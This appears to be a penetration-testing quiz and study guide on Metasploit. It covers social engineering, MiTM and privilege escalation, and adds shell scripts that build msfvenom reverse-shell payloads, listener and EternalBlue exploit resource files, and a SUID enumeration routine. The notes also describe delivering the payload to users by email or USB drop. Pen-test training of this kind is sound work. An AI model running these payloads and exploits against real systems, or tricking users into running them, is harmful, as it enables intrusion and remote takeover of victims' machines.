Exploiting Systems with Metasploit
Questions and Answers

What is the primary goal of attackers posing as individuals from a fraud department?

  • To retrieve personal login information (correct)
  • To promote legitimate financial services
  • To encourage security awareness among users
  • To provide security updates to users

Which of the following is NOT a type of physical security control mentioned?

  • Traditional locks and keys
  • Electronic locking systems
  • High fencing around the perimeter
  • Biometric scanning systems (correct)

What is the purpose of ID badges in a highly secured environment?

  • To prove employment duration
  • To control access to the building (correct)
  • To ensure employee training is up-to-date
  • To identify employees for internal communications

How do security guards contribute to physical security at facility entrances?

    By ensuring everyone has proper identification

What method is mentioned as a way to control access within different areas of a building?

    Locked doors

What is the focus of penetration testing in relation to physical security?

    To exploit vulnerabilities and gain unauthorized access

What might visitors need to do before gaining entry to a secure facility?

    Obtain a guest badge and be escorted

What is a common misconception about the role of security guards in a facility?

    They only monitor external threats

What potential risk is associated with users' password hashes when using LSASS?

    They can be dumped to a file for cracking.

Which of the following scenarios could lead to vulnerabilities in unattended installations?

    Using default installation settings.

What information does the SAM database primarily store?

    Users' password hashes and usernames.

What is DLL hijacking?

    Loading a malicious DLL in place of a genuine DLL.

How can unquoted service paths pose security risks?

    They can lead to privilege escalation by manipulating paths.

What is the primary target of a whaling phishing attack?

    The CEO or high-level executives

What does the 'sc config' command allow an attacker to do?

    Modify the configuration of writable services.

What does a USB key drop test the security awareness of?

    The employees' response to untrusted devices

What type of permissions can lead to vulnerabilities in a system?

    Non-secure file and folder permissions.

Which social engineering tactic involves tricking users into revealing sensitive information by impersonating a trusted figure?

    Impersonation

What is one consequence of having unpatched services running on a system?

    They may provide attackers a pathway into the system.

What is the potential outcome of successfully executing a USB key drop?

    Identification of potential network targets

What should be defined in the rules of engagement regarding penetration testing?

    Whether social engineering attacks are permitted

What is one of the purposes of conducting interrogation in social engineering?

    To gather sensitive information through questioning

Which phrase best describes a 'watering hole attack' in social engineering?

    Targeting a specific group of users through compromised websites

What should a penetration tester do before performing social engineering attacks?

    Obtain specific permissions as outlined in the engagement rules

What is the purpose of the command 'set payload windows/x64/meterpreter/reverse_tcp'?

    To specify the payload type for the exploit.

What should you do if you encounter an error while running the exploit command?

    Use the 'show options' command to check for missing settings.

After obtaining a meterpreter session, which of the following actions can you perform?

    Turn on the target's webcam.

What does msfvenom primarily do?

    It generates payloads (shellcode) in a chosen output format, for example a Windows executable.

In the context of exploiting a system, what is a 'reverse shell'?

    A connection that the target opens back to the attacker's listener.

Which command is useful for verifying the settings of a payload before executing the exploit?

    show options

Which of the following best describes the meterpreter prompt?

    It shows that a meterpreter session has been opened on the target.

What is the first step to exploit a system using the generated malicious program?

    Record the attacker's (Kali) IP address using ifconfig; it becomes LHOST.

What physical reaction often indicates stress during an interview or interrogation?

    Touching their face

What occurs in a watering hole attack?

    Compromising a website the targets already visit so that it serves malicious code

What is the primary goal of social engineering attacks?

    To elicit a response that compromises security

Which influence technique involves suggesting urgency to trick users into acting quickly?

    Urgency

In social engineering, how does the authority technique typically work?

    By pretending to be a person of authority demanding an action

What does a business email compromise (BEC) attack primarily exploit?

    Gaining unauthorized access to an employee's email account

What is a common outcome when someone feels a sense of scarcity during a social engineering attack?

    They may quickly follow through with the requested action

Which social engineering technique could involve offering a limited-time prize to entice action?

    Scarcity

What is SSL stripping primarily used for?

    To remove encryption from the victim's side of the communication during a MiTM attack

In a downgrade attack, which of the following is the attacker attempting to force the victim to use?

    An older, less secure protocol version

What is the main function of SETH in a MiTM attack?

    To capture RDP logon credentials passing between a client and a server

What initial command should you run to configure your network interface in Kali before using SETH?

    ifconfig

Which command is used to download SETH?

    git clone https://github.com/SySS-Research/Seth.git

What is a potential risk when the RDP server is on a different subnet during a MiTM attack with SETH?

    The gateway (router) IP address must be used in place of the server's IP

What does the attacker achieve by having a secure connection with the website during SSL stripping?

    The attacker holds the TLS session with the site, so traffic between the site and the victim passes through the attacker in the clear

What is one requirement before executing the SETH script?

    The RDP client's (victim's) IP address must be known

    Study Notes

    Exploiting Systems

    • The third phase of penetration testing involves exploiting vulnerabilities to gain access to target systems.
    • Common exploitation techniques include SMB exploits, pass the hash, password cracking, social engineering, man-in-the-middle (MiTM) attacks, and physical security attacks.
    • Metasploit is a popular exploit tool.
    • Critical vulnerabilities should be prioritized for exploitation.

    Exploiting Systems with Metasploit

    • After a vulnerability scan, a list of exploitable vulnerabilities is generated.
    • Metasploit Framework is a common exploit tool.
    • It's pre-installed on Kali Linux, but downloadable for other platforms.
    • The process involves searching for a suitable exploit using exploit information from vulnerability scans.
    • Exploits are ranked (manual, low, average, normal, good, great, or excellent). The rank reflects how reliably the module works and how likely it is to crash the target service, so prefer higher-ranked modules when several match.
    • Each module also carries a description of the vulnerability, affected versions and any prerequisites.

    Starting Metasploit

    • Start a terminal session in Kali Linux.
    • Run msfconsole.
    • The Metasploit prompt (msf >, shown as msf6 > in current versions) appears.
    • Use the ? or help command to list all available commands.
    • Use the search command to find an exploit; for example, msf > search EternalBlue searches for exploits relevant to EternalBlue.

    Searching for an exploit

    • Identify the exploit from the vulnerability scan report.
    • Search using the exploit ID (e.g., MS17-010) or a descriptive term (e.g., EternalBlue).
    • Note the exploit's path (e.g., exploit/windows/smb/ms17_010_eternalblue) for later use.

    Exploiting

    • Identify required options using the show options command.
    • Use set to fill in required options; for instance, set RHOSTS 192.168.67.135 (older modules name this option RHOST).
    • Where the module supports it, run check first to confirm the target is vulnerable without exploiting it.
    • Run exploit.
    • The output displays the exploit's progress. A Windows command prompt (or a meterpreter > prompt, depending on the payload) means you have a session on the target.
    • From there, post-exploitation commands are used to manage the system or retrieve account information.

    Setting the payload

    • The payload is code to execute on the target post exploitation.
    • Use show payloads to view available payloads.
    • Use set payload to select a specific payload (e.g., set payload windows/x64/meterpreter/reverse_tcp).
    • Run the exploit again to use the selected payload.

    Using msfvenom

    • Msfvenom is Metasploit's payload generator: it produces a standalone malicious program that connects back to the pen-test system.
    • Generate a reverse TCP meterpreter payload with, for example, msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip_of_Kali> LPORT=4444 -f exe -o <output_file>.exe (-f selects the output format, -o the file to write).

    Phase 1: Create the malicious program

    • LHOST is your Kali IP address, the address the payload connects back to.
    • LPORT is the port the payload connects to (4444 here); the listener must use the same port.
    • The result is a program that, when run on the target, opens a connection back to your system.

    Phase 2: Set up a listener

    • Launch msfconsole and load the generic handler: use exploit/multi/handler.
    • Set the same payload that msfvenom was given: set payload windows/meterpreter/reverse_tcp.
    • Set the local host: set LHOST <ip_of_Kali> (LPORT defaults to 4444, matching the payload above).
    • Run exploit. This starts a listener that waits for the payload to connect.

    Phase 3: Trick users into running the program

    • Deliver the program to the target (e.g. email attachment, dropped USB drive).
    • When the target user runs it, the payload connects back to your listener and a meterpreter session opens.
    • Use the session to further compromise the system.
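The shell script below is an added example; it is not part of the original notes or of Metasploit. It ties the two procedures above together (the show options / set / exploit sequence and the msfvenom + multi/handler phases) by generating msfconsole resource scripts, so the payload, LHOST and LPORT handed to msfvenom and to the handler cannot drift apart (the usual cause of "the payload ran but no session came back"), and by running check before exploit. The interface name eth0, the file name payload.exe and the addresses in the usage lines are assumptions. The module names and options (exploit/multi/handler, exploit/windows/smb/ms17_010_eternalblue, RHOSTS, LHOST, LPORT, PAYLOAD, ExitOnSession) are real Metasploit identifiers.

```shell
#!/bin/sh
# Generate Metasploit resource scripts (.rc) whose LHOST/LPORT/payload match
# the msfvenom command line. Run a generated file with: msfconsole -q -r file.rc
# Assumptions (not from the notes): interface eth0, output name payload.exe.

valid_ipv4() {
    # Dotted quad, each octet 0-255; rejects hostnames and typos like .300
    echo "$1" | grep -Eq '^([0-9]{1,3}\.){3}[0-9]{1,3}$' || return 1
    for o in $(echo "$1" | tr '.' ' '); do
        [ "$o" -le 255 ] || return 1
    done
}

valid_port() {
    echo "$1" | grep -Eq '^[0-9]+$' && [ "$1" -ge 1 ] && [ "$1" -le 65535 ]
}

kali_ip() {
    # First IPv4 address on the interface (default eth0). The notes use
    # ifconfig; `ip` is its current replacement on Kali.
    ip -4 -o addr show dev "${1:-eth0}" | awk '{print $4}' | cut -d/ -f1 | head -n1
}

# msfvenom command line for the payload. Arguments: LHOST LPORT PAYLOAD OUTFILE
venom_cmd() {
    valid_ipv4 "$1" && valid_port "$2" || return 1
    printf 'msfvenom -p %s LHOST=%s LPORT=%s -f exe -o %s\n' "$3" "$1" "$2" "$4"
}

# Resource script for the listener (Phase 2). Arguments: LHOST LPORT PAYLOAD
# ExitOnSession false + exploit -j -z keep the handler up for multiple victims.
handler_rc() {
    valid_ipv4 "$1" && valid_port "$2" || return 1
    cat <<EOF
use exploit/multi/handler
set PAYLOAD $3
set LHOST $1
set LPORT $2
set ExitOnSession false
exploit -j -z
EOF
}

# Resource script for the EternalBlue module. Arguments: RHOST LHOST LPORT MODE
# MODE "check" only verifies the target is vulnerable; "exploit" also fires it.
eternalblue_rc() {
    valid_ipv4 "$1" && valid_ipv4 "$2" && valid_port "$3" || return 1
    cat <<EOF
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS $1
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST $2
set LPORT $3
check
EOF
    [ "$4" = "exploit" ] && echo "exploit"
    return 0
}

# Stand-alone use, e.g.:
#   ./msf_rc.sh venom   "$(kali_ip eth0)" 4444 windows/meterpreter/reverse_tcp payload.exe
#   ./msf_rc.sh handler "$(kali_ip eth0)" 4444 windows/meterpreter/reverse_tcp > handler.rc
#   ./msf_rc.sh eb      192.168.67.135 "$(kali_ip eth0)" 4444 check > eb.rc
case "${1:-}" in
    venom)   shift; venom_cmd "$@" ;;
    handler) shift; handler_rc "$@" ;;
    eb)      shift; eternalblue_rc "$@" ;;
esac
```

The 64-bit meterpreter payload in the EternalBlue script is the one the notes select with set payload; the staged payload from msfvenom must be the same one the handler expects, which is why both are taken from a single argument rather than typed twice.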

    Using exploit resources

    • Exploit-DB (exploit-db.com) is a searchable archive of public exploits and proof-of-concept code; searchsploit queries a local copy of it on Kali.
    • Use it alongside the vulnerability scan results to find exploit code for the CVEs or product versions identified.

    Understanding Social Engineering

    • Social engineering is a deception technique to compromise system security with social interaction (e.g. emails, texts, phone calls).
    • Common types include spear phishing, SMS phishing, vishing, and whaling.

    Other common attacks

    • DNS cache poisoning: Attacker alters DNS resolution to direct users to a fake site.
    • Pass the hash: Use a victim's password hash to authenticate to other systems.

    DoS/stress testing

    • DoS/stress testing floods a system with requests to overload it.
    • Verify permitted use for penetration tests before performing DoS attacks.

    NAC bypass

    • Network Access Control (NAC) checks a device (identity, posture, MAC address) before admitting it to the network.
    • Attackers can spoof the MAC address of an already authorized device (for example a printer or VoIP phone) to bypass MAC-based NAC.

    VLAN hopping

    • VLANs (virtual LANs) split one switched network into separate broadcast domains; traffic between VLANs must pass through a router or layer-3 switch.
    • VLAN hopping abuses 802.1Q tagging (double tagging) or trunk negotiation (switch spoofing via DTP) to reach a VLAN the attacker's port was not assigned to.

    MAC spoofing

    • Changing the MAC address of a device to impersonate another.

    Exploiting Local-Host Vulnerabilities

    • Vulnerabilities in specific operating systems (Windows, macOS, Linux) and services are tested.

    Unsecure service/protocol configurations

    • Vulnerable services or protocol settings (e.g., default folders, permissions) can be exploited.

    Privilege escalation

    • Exploiting a vulnerability or misconfiguration to move from a low-privileged account to a higher-privileged one (root or SYSTEM).
    • Linux-specific exploits: SUID/SGID programs, Ret2libc, sticky bit, unsecure SUDO.
    • Windows-specific exploits: Cpassword (Group Policy Preferences), clear-text credentials in LDAP, Kerberoasting, credentials in LSASS.
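Added example (not from the original notes): a POSIX shell enumeration of the Linux conditions listed above, SUID/SGID programs and sticky-bit/world-writable locations, as a tester would run after landing a low-privileged shell. It uses only find; the directory-root argument is an assumption so the same functions can be pointed at a test tree instead of /.

```shell
#!/bin/sh
# Enumerate local privilege-escalation candidates under a directory tree:
#  - SUID/SGID executables: run with the file owner's/group's privileges
#  - world-writable directories without the sticky bit: anyone can rename or
#    delete other users' files there (the sticky bit is what protects /tmp)
#  - world-writable regular files: scripts or configs an attacker can tamper with
# Assumption: ROOT defaults to / but may be any directory; -xdev stays on one
# filesystem so /proc and network mounts are skipped.

find_suid_sgid() {
    # -perm -4000 = setuid bit set, -perm -2000 = setgid bit set
    find "${1:-/}" -xdev -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null
}

find_ww_dirs_no_sticky() {
    # other-writable (0002) directories lacking the sticky bit (1000)
    find "${1:-/}" -xdev -type d -perm -0002 ! -perm -1000 2>/dev/null
}

find_ww_files() {
    find "${1:-/}" -xdev -type f -perm -0002 2>/dev/null
}

privesc_report() {
    root="${1:-/}"
    echo "== SUID/SGID binaries under $root =="
    find_suid_sgid "$root"
    echo "== World-writable directories without sticky bit =="
    find_ww_dirs_no_sticky "$root"
    echo "== World-writable files =="
    find_ww_files "$root"
}

# Stand-alone use: ./privesc_enum.sh /     (no argument prints nothing)
[ -n "${1:-}" ] && privesc_report "$1"
```

A SUID binary is only an escalation path if it can be abused (it spawns a shell, writes files as its owner, or loads libraries from a writable path), so compare the list against the distribution's standard SUID set and look into anything unusual; the world-writable results matter when a privileged cron job or service reads from them.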

    Common exploits

    • Exploits target common networking services/protocols (e.g., SMB, FTP, SNMP, SMTP).
    • Name resolution exploits manipulate name-to-IP address resolution.
    • LLMNR/NBT-NS poisoning: when a Windows host cannot resolve a name via DNS it falls back to broadcasting Link-Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NBT-NS) queries; an attacker on the same segment answers with their own address, and the victim authenticates to the attacker, leaking an NTLM challenge-response.
    • NTLM relay attacks forward that authentication to another host in real time to act as the victim; captured NTLMv2 challenge-responses can instead be cracked offline (they are not the stored password hash itself).

    Description

    This quiz focuses on the techniques and tools used in the third phase of penetration testing, particularly the Metasploit Framework. Participants will learn about common exploits, the exploitation process after vulnerability scans, and how to effectively utilize Metasploit. Understanding these concepts is essential for anyone interested in cybersecurity and penetration testing.
